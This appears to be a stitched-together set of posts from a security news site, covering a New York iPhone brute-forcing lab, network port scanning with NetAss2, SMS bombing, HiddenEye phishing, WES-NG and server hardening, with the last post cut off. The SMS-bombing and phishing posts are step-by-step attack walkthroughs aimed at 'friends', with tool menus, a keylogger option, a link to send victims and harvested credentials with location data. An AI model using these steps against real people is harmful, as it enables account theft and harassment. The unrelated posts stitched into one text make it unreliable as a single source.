With the release of the iOS8 operating system, Apple began implementing encryption on all of its products to protect users, as they were too exposed to malicious hacking activity. An identical measure was implemented by Google soon after. Since then it began somewhat a race between US government agents trying to obtain information from these devices and the developer companies, which were increasingly implementing stringent security measures.

The dispute between the US government and these companies is far from be over; meanwhile, law enforcement agencies have found a third way to bypass encryption on these devices without violating data protection legislation. Cyrus Vance Jr., Manhattan district attorney, and the city’s Cybercrime Unit, created a kind of prison for a specific purpose: extracting information stored on some smart devices using brute force tactics before their owners delete this data, which could be useful in criminal investigations.

The entrance to this “prison” resembles that of a bunker. This installation consists of a radio frequency isolation chamber protected behind two hermetically sealed steel doors. On the walls of this camera are connected dozens of Apple devices (iPad/iPhone), which were confiscated during the commission of currently investigated crimes.

All devices found in these facilities are connected to a set of massive processing power computers, dedicated to generate random number sequences to try to decrypt the access codes to these confiscated devices. Researchers working here can even take advantage of other systems that aren’t used at night to create a local supercomputer network, mentions a review of the business magazine Fast Company.

During the interview, Steve Moran, director of the High Technology Analysis Unit, shows as an example of the work done in this lab an iPhone in which more than 10k possible combinations have been tested: “This would have been enough to decrypt a four-digit password. However, Apple has been using six-digit access codes for the last five years, which requires a million possible combinations to be tested,” he said.

In addition, data protection specialists point out that Apple restricts the number of times per minute an access code can be entered; this is where investigators of these possible crimes come in. “It is required to think about possible combinations. We need to know some facts: date of birth, wedding anniversary, birthday of wives or children, even the number of favorite baseball player can be helpful in reducing the number of attempts needed to unlock the devices of the suspects” , adds Moran.

This is not the only variable that affects the operations of this lab, because in addition to the huge number of combinations to test, researchers should also prioritize some specific devices. To this, Moran designed a workflow that evaluates the most urgent cases; there are currently more than 3,000 low-priority devices sheltered in these facilities.

As already mentioned, Apple and Google’s main argument for encryption is data protection, a position entirely justified considering that these companies cover almost 99% of the global smartphone market.

While companies claim that no one, not even their internal staff, can access a device with encryption, prosecutor Vance believes it highly likely that Apple will have some kind of secret backdoor. “Apple accesses our devices all the time: OS updates, SMS messages, external links, it’s all part of that invasive practice.” Despite these claims, shared by a considerable number of experts on the subject, the user privacy speech has prevailed over the demand for access to these files.

On the other hand, Vance considers that the request to remove encryption is not exaggerated or unfounded, as there are cases where information stored on smart devices recovered at crime scenes or raids has been instrumental to solve complex cases. An example is the arrest and conviction of Lamar Davenport for the murder of E’Dena Hines, granddaughter of actor Morgan Freeman. The prosecutor in charge of the case presented as evidence a video found on the defendant’s iPhone after months of investigation to access to the device. “Not only that; thanks to the activity of this laboratory we have found useful information to prove the innocence of at least 16 suspects in various crimes,” he adds.

Vance’s anti-encryption campaign has not been limited to his local environment. The prosecutor has met on several occasions with members of Europol, Interpol, besides publishing articles in all kinds of magazines, in addition to trying to establish contact with the representatives of the technology companies.

The International Institute of Cyber Security (IICS) points out that, before 2014, technology companies seemed to have no problem cooperating with law enforcement agencies, even noting that Apple’s collaboration was considered outstanding and effective. However, this cooperative work came to a breaking point after Edward Snowden’s revelations about the US National Security Agency’s espionage activity. While all of the tech companies mentioned by Snowden denied collaborating with the US government, Apple opted for a more vigorous demonstration of privacy engagement, launching the iOS 8 system, which included full encryption for the first time.

This laboratory is one of the main tools for the investigation of criminal cases in the city, as it has the most complex hardware resources available, in addition to specially developed software to apply brute force to these devices. However, with the emergence of new versions of mobile operating systems, the work of these researchers becomes increasingly complex. “At the beginning of this project, only 52% of the smartphones analyzed were locked, while the number of locked devices is currently 82%,” Moran says, so government agencies also bet on legislation on encryption on mobile devices streamlines this work. 

The post New York has an electronic prison for hacking iPhones appeared first on Information Security Newspaper | Hacking News.

Network Pentesting Methodology

As explained above network pentesting should be done consistently to secure corporate networks. Below you can see network pentesting methodology.

• Information Gathering – This phase consists of service enumeration. Here open ports & services are scanned. Mostly ports are scanned to find any vulnerabilities. In scanning phase discovered hosts are prime source for finding un-patched security. Most companies uses wifi based printers which are most common threats for attacking. In this phase pentesters tries to find as much information as possible. This is the most important phase where collected information is used to find vulnerabilities. Netass2 is helpful finding open ports & services, also help in discovered hosts.
• Threat Modeling – Here automate scanners are used. In this phase collected information from above phase is used. Threat Modeling identify assets & divide into threat categories. These might consists of password hashes, un-patched security updates, using outdated firewall policies which helps attacker to enter into network using MITM methods.
• Vulnerability Analysis – This phase involves analysis of founded vulnerabilities. This phase includes of various security tools & manual testing. In this phase many vulnerabilities has to analyzed. Plan of attacking is designed here.
• Exploitation – This phase involves actual attacking on founded vulnerabilities. Exploitation includes intense attacking on the vulnerabilities.
• Reporting – This phase reports all the founded vulnerabilities with a proper reporting format. This phase needs to be written & verified properly. As it includes all the details of vulnerabilities & shows the value of our services.

Netass2 (Network Assessment Assistance Framework) is used to scan local network in Information gathering phase. Netass2 uses nmap & zenmap modules for scanning given hosts.

• For testing we will use Kali Linux 2018.2 amd64. Open terminal type git clone https://github.com/zerobyte-id/NetAss2.git
• Type cd NetAss2
• Type ls
• Type chmod 755 install.bash netass2.bash
• Type ./netass2.bash

root@kali:/home/iicybersecurity/Downloads/NetAss2# ./netass2.bash

 ------------------------------------------
 | NAME  : Network Assessment Assistance  |
 | ALIAS : NetAss2                        |
 | TYPE  : VA Framework                   |
 | VERS  : 0.1-RC                         |
 | LICEN : GPL v3                         |
 | LINK  : github.com/zerobyte-id/NetAss2 |
 ------------------------------------------

• Enter project name – project02

Enter a project name: project02

 --------------------------------------------------

      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT

INPUT: 1
 ----------------[ HOST DISCOVERY ]----------------
 NOTE: Your network block reminder
 192.168.1.102/24
 NOTE: Enter the network block that you want to scan
 NOTE: Example: 192.168.1.0/24 

• Enter network subnet. For finding network subnet, run ipconfig and check the IP Address and Subnet Mask in the output. After getting the network subnet enter it as shown below.

• Type 192.168.1.1/24

   --------------------------------------------------

      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT

 INPUT: 1

 ----------------[ HOST DISCOVERY ]----------------

 NOTE: Your network block reminder
  + 192.168.1.102/24

 NOTE: Enter the network block that you want to scan
 NOTE: Example: 192.168.1.0/24

INPUT: 192.168.1.1/24

 INFO: Nmap run...
 INFO: Discovering host...

 Host
 ------------
 192.168.1.1
 192.168.1.12
 192.168.1.102
 192.168.1.103

 --------------------------------------------------

• Above shows the available hosts on network. For finding open ports. Type 2

 --------------------------------------------------

      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT

INPUT: 2
  -----------[ PORT SCAN ON SINGLE HOST ]-----------
  INFO: Discovered host
  192.168.1.1
  192.168.1.12
  192.168.1.102
  192.168.1.103
  NOTE: Enter the specific host that you want to scan
  NOTE: Example: 192.168.1.100
  INPUT: 192.168.1.103
  INFO: Nmap run…
  INFO: Discovering port on 192.168.1.103…
  IP Addr        Port      Service          Vendor
  -------        ----      -------          ------
  192.168.1.103  135/tcp   msrpc            Microsoft Windows RPC
  192.168.1.103  139/tcp   netbios-ssn      Microsoft Windows netbios-ssn
  192.168.1.103  445/tcp   microsoft-ds?
  192.168.1.103  902/tcp   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
  192.168.1.103  912/tcp   vmware-auth      VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
  192.168.1.103  1536/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1537/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1538/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1539/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1540/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1541/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1545/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  1569/tcp  msrpc            Microsoft Windows RPC
  192.168.1.103  3389/tcp  ms-wbt-server    Microsoft Terminal Services 

• Above output shows open ports which shows target can be vulnerable to different windows vulnerabilities. Netass2 is used in network pentesting.
• Type 3

--------------------------------------------------
      __     _     _           ____
   /\ \ \___| |_  / \  ___ ___|___ \
  /  \/ / _ \ __|/ O \/ __/ __| __) |
 / /\  /  __/ |_/  _  \__ \__ \/ __/
 \_\ \/ \___|\__\_/ \_/___/___/_____\
     Network Assessment Assistance

 [1]. HOST DISCOVERY
 [2]. PORT SCAN ON SINGLE HOST
 [3]. MASSIVE PORT SCAN VIA DISCOVERED HOSTS
 [4]. MASSIVE PORT SCAN VIA LIST ON FILE
 [5]. SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
 [6]. MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
 [!]. SHOW REPORTS
 [0]. EXIT

INPUT: 3

 ----[ MASSIVE PORT SCAN VIA DISCOVERED HOSTS ]----

 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.1...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.12...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.102...
 INFO: Nmap run...
 INFO: Discovering port on 192.168.1.103...

 IP Addr        Port       Service          Vendor
 -------        ----       -------          ------
 192.168.1.1    21/tcp     ftp              Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
 192.168.1.1    23/tcp     telnet           Netgear broadband router or ZyXel VoIP adapter telnetd
 192.168.1.1    80/tcp     upnp
 192.168.1.1    7547/tcp   upnp
 192.168.1.12   135/tcp    msrpc            Microsoft Windows RPC
 192.168.1.12   139/tcp    netbios-ssn      Microsoft Windows netbios-ssn
 192.168.1.12   445/tcp    microsoft-ds     Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
 192.168.1.12   554/tcp    rtsp?
 192.168.1.12   2869/tcp   http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   3389/tcp   ms-wbt-server    Microsoft Terminal Service
 192.168.1.12   3389/tcp   ms-wbt-server?
 192.168.1.12   5357/tcp   http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   10243/tcp  http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 192.168.1.12   49152/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49153/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49154/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49155/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49156/tcp  msrpc            Microsoft Windows RPC
 192.168.1.12   49157/tcp  msrpc            Microsoft Windows RPC
 192.168.1.102  22/tcp     ssh              OpenSSH 7.6p1 Debian 4 (protocol 2.0)
 192.168.1.103  135/tcp    msrpc            Microsoft Windows RPC
 192.168.1.103  139/tcp    netbios-ssn      Microsoft Windows netbios-ssn
 192.168.1.103  445/tcp    microsoft-ds?
 192.168.1.103  902/tcp    ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
 192.168.1.103  912/tcp    vmware-auth      VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
 192.168.1.103  1536/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1537/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1538/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1539/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1540/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1541/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1545/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  1569/tcp   msrpc            Microsoft Windows RPC
 192.168.1.103  3389/tcp   ms-wbt-server    Microsoft Terminal Services

 --------------------------------------------------

• Above output shows open ports of all discovered hosts on local network. Network pentesting shows open ports & services which then can be used in another phases attacking.

Others Types of Network Level Attacks

Some network level attacks which occur in last year. There are many network level attacks. Day to day such cases of network attacks are coming. Such companies loss lot of money because of cyber attacks as commented by Ethical hacking expert of International Institute of Cyber Security.

• Browser Attacks – These types of network attacks are the most common. As explained above attacker tries to find vulnerabilities of running host on local network. They tries to breach the security through browser, most common utility is used to access internet.
• Brute Force Attacks – Such attacks uses larger size of keywords or dictionary is created by gathering information about the target. Installing malware sometimes takes time to attack an machine because in this attack. Victim has to click on the malware.
• DOS (Denial of Service Attacks) – Multiple packets are send to particular port to interrupt the ongoing service of running server or website. DOS attacks are very common & not many companies are able to recover their resources.
• Malware Attacks – Such attacks uses a piece of malware in the form of windows executable or other OS software, to create an reverse session of victim computer. Malware attacks are very serious as it gives all permission to attack for accessing victim computer.

The post How to do penetration testing of your network – Step by Step Guide appeared first on Information Security Newspaper | Hacking News.

Fake text or fake SMS or fake message are the biggest threat industry is facing. All applications require an account to keep your settings, app usage. While registering through applications, they generally require mobile number for registering & returns with OTP (One Time Password). You might encounter many times you receive unnecessary OTPs from different recipients. Many times attacks/ spammers uses SMS bombing techniques to irritate or disturb their targets.

SMS bombing is a technique of sending fake messages on any mobile number. SMS bombing uses an script containing SMS Gateway APIs. It uses SMS APIs of different SMS gateways. According to ethical hacking researcher of international institute of cyber security SMS bombers utilizes different gateways. SMS gateway providers gives services of forwarding, routing & storing incoming messages. For sending messages using SMS gateway connect with SMSC centers.

Some popular SMS Gateways are :-

• You can also check free APIs & you can use in creating sms bomber scripts. Go to : https://rapidapi.com/
• Nexmo SMS Messaging
• Twillo SMS
• TeleSign
• D7SMS
• Telnyx
• MessageBird
• Click Send (IntelTech)

SMS Bomber Application :-

• There are different tools which are used in SMS bombing. BombitUP is an application used in SMS bombing.
• Download application : https://www.bombitup.net/
• Download & install BOMBitUP_v4.03.1.apk
• Enter target mobile number & then enter no. of count messages you want to send.
• Click on BOMBIT

• You can also setup delays in no. of seconds. By default is 2.5 second.

• It depends on the bombit server. But most of times messages are sent on time.
• Click on Bombit

• Above screenshot shows that 10 messages has been sent. Below shows received messages.

• Above you can see received messages on the target number.

You can checkout the SMS Bomber practical :-

As per the ethical hacking researcher of International Institute of Cyber Security there are many more ways to send fake SMS or fake messages to do social engineering attacks

The post Fake text message attack. How Prank or hack your Friends with fake SMS Bomber appeared first on Information Security Newspaper | Hacking News.

Even phishing is still most popular cyber attack used by many attackers/ spammers. We will show python script written in python. Modern phishing tool is used phishing tool which gives wide variety of social networks.

• For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7, wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
• After installing above requirements. Type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
• Then type cd HiddenEye && ls
• Type pip3 install -r requirements.txt
• Type python3 HiddenEye.py
• Type y

HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y

• Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>

• Type 3

 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3

• Type Y

        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------

[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y

• Type www.facebook.com

        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------

**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com

• Type 443

[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443

• Type 2

[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2

• Type 2

[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

• Open another temrinal & go to below location cd /home/iicybersecurity/HiddenEye/ Server/www/ && php -S 127.0.0.1:443 > /dev/null

root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 

• As you will open https://127.0.0.1:443 in your web browser. You will see victim interaction where you have started server.
• Enter username & password.
• For sending fake page to your friends you can send fake email to your friends using public URL generated, in this case it is https://viduo.seveo.net. You can send https://viduo.seveo.net & you can also check using your loopback URL for testing on Ubuntu machine, https://127/0/0/1:443

• After entering username & password. You will found login credentials in terminal where you have started HiddenEye.py

…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….

• Above you can see login credentials
• All these scenarios are demonstrated in ethical hacking courses offered by International Institute of Cyber Security

The post Hack your friends Facebook account using HiddenEye appeared first on Information Security Newspaper | Hacking News.

WES-NG Windows Exploit Suggester is a tool based on Windows systeminfo utility. It provides list of vulnerabilities which includes exploits of Windows OS. All Windows version including Windows server versions is supported.

• For testing we will use Windows 10 1809 64 Bit. Make sure that Windows is configured with python3.
• For installing python go to : https://www.python.org/downloads/
• After downloading install python for all users. If the python path is not set automatically. Set path in Windows enviroment variables.
• Go to My computer properties < Advanced < Enviroment Variables < System Variables
• Click on New & in Variable type Path then enter Value C:\Program Files (x86)\Python37-32\Scripts\
• Type python –version

• After configuring the python. Download the WES-NG from : https://github.com/bitsadmin/wesng
• After downloading, unzip the WES-NG. Then open CMD (Command Prompt) as administrator
• Go to location where you have download & unziped the WES-NG.

• Then open another cmd as adminstrator & gather system configuration. For that type systeminfo.exe

• Copy system info into text file. Type systeminfo > systeminfo.txt

• An new text file will be created. Copy the systeminfo.txt into wesng-master folder.
• Then execute wes.py systeminfo.txt
• Now wes-ng will start finding vulnerabilities on the basis of system information.

• Above screenshots shows 116 vulnerabilities of Windows 1809. We have posted some vulnerabilities to show how tool works. These type of tools are quite often used by Ethical hacking researcher.
• If you open any vulnerability for ex – we have open last CVE 2019-1081. As wes-ng finds vulnerabiltiy in CVE & exploitdb.

• Above shows the disclousure vulnerability in microsoft browsers improperly handle objects in memory.
• Wes-ng updates list of definitions from : https://raw.githubusercontent.com/bitsadmin/wesng/master/definitions.zip to show the list CVEs and exploits of given operating system.

The post All-New Windows Exploit Suggester is here, WES-NG appeared first on Information Security Newspaper | Hacking News.

LAMP

LAMP is an open source utility used for creating web applications. Lamp is also specified as Lamp stack because it consists of four layers.

Lamp stands for (Linux, Apache, MySQL and PHP). Many developers used LAMP to develop & deploy web application. JShielder is used to secure Linux servers in which developers want to deploy their web applications. Jshielder automates the process of installing required packages to host web applications. In other words JShielder act as a Server Hardening (Server Hardening is a process to enhance server security) Some common tips of server hardening includes :-

• Data Encryption for communication.
• Changes protocols which sends important information in plain text.
• Closes unnecessary services running on server.
• Keep OS up to date, specially the security patches & malware removal tools.
• Regularly update security policies.
• Maintains & regularly checks the server logs.

JShielder Requires following configuration:-

• Configures a Hostname
• Reconfigures the Timezone
• Updates the entire System
• Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
• Helps user Generate Secure RSA Keys, so that remote access to your server is done exclusive from your local pc and no Conventional password
• Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark)
• Configures IPTABLES Rules to protect the server from common attacks
  Disables unused FileSystems and Network protocols
• Protects the server against Brute Force attacks by installing a configuring fail2ban
• Installs and Configure Artillery as a Honeypot, Monitoring, Blocking and Alerting tool
• Installs PortSentry
• Install, configure, and optimize MySQL
• Install the Apache Web Server
• Install, configure and secure PHP
• Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
• Secures NginX with the Installation of ModSecurity NginX module
  Installs RootKit Hunter
• Secures Root Home and Grub Configuration Files
• Installs Unhide to help Detect Malicious Hidden Processes
• Installs Tiger, A Security Auditing and Intrusion Prevention system
• Restrict Access to Apache Config Files
• Disables Compilers
• Creates Daily Cron job for System Updates
• Kernel Hardening via sysctl configuration File (Tweaked)
  /tmp Directory Hardening
• PSAD IDS installation
• Enables Process Accounting
• Enables Unattended Upgrades MOTD and Banners for Unauthorized access
• Disables USB Support for Improved Security (Optional)
• Configures a Restrictive Default UMASK
• Configures and enables Auditd
• Configures Auditd rules following CIS Benchmark
• Sysstat install
• ArpWatch install
• Additional Hardening steps following CIS Benchmark Secures Cron
• Automates the process of setting a GRUB Bootloader Password
  Secures Boot Settings
• Sets Secure File Permissions for Critical System Files

According to ethical hacking researcher of International Institute of Cyber Security, all the above points are required by network administrators to secure their servers.

JShielder Installation ;-

• For testing we will use Ubuntu 18.04 LTS. Before using JShielder LAMP must installed & configured in your Linux system. LAMP is just XAMPP which mostly used on Windows OS.
• For installing LAMP open terminal type sudo apt-get update && For installing mysql type sudo apt- get install mysql-server mysql-client

root@ubuntu:/home/iicybersecurity# sudo apt-get update
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
root@ubuntu:/home/iicybersecurity# sudo apt-get install mysql-server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server-5.7
   mysql-server-core-5.7
 Suggested packages:
   libipc-sharedcache-perl mailx tinyca
 The following NEW packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server mysql-server-5.7
   mysql-server-core-5.7

• For installing apache type sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert

root@ubuntu:/home/iicybersecurity# sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 ssl-cert is already the newest version (1.0.39).
 libexpat1 is already the newest version (2.2.5-3ubuntu0.1).
 The following additional packages will be installed:
   apache2-bin apache2-data libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0
 Suggested packages:
   apache2-suexec-pristine | apache2-suexec-custom
 The following NEW packages will be installed:
   apache2 apache2-bin apache2-data apache2-doc apache2-utils libapr1 libaprutil1 libaprutil1-dbd-sqlite3
   libaprutil1-ldap liblua5.2-0

• For installing PHP type sudo apt-get install php && sudo apt-get install phpmyadmin This command will ask to reconfigure apache server. You have to select apache & then it will ask to configure password for myql. Enter secure password & all the dependencies will be configured. Password should be highly secure as it is always communicated in the day one class of International Institute of Cyber Security (IICS, iiCyberSecurity)

root@ubuntu:/home/iicybersecurity# sudo apt-get install php
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libapache2-mod-php7.2 php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 Suggested packages:
   php-pear
 The following NEW packages will be installed:
   libapache2-mod-php7.2 php php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 0 upgraded, 9 newly installed, 0 to remove and 387 not upgraded.
 Need to get 3,863 kB of archives.
root@ubuntu:/home/iicybersecurity# sudo apt-get install phpmyadmin
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip
 Suggested packages:
   php-libsodium php-mcrypt php-gmp php-imagick
 The following NEW packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
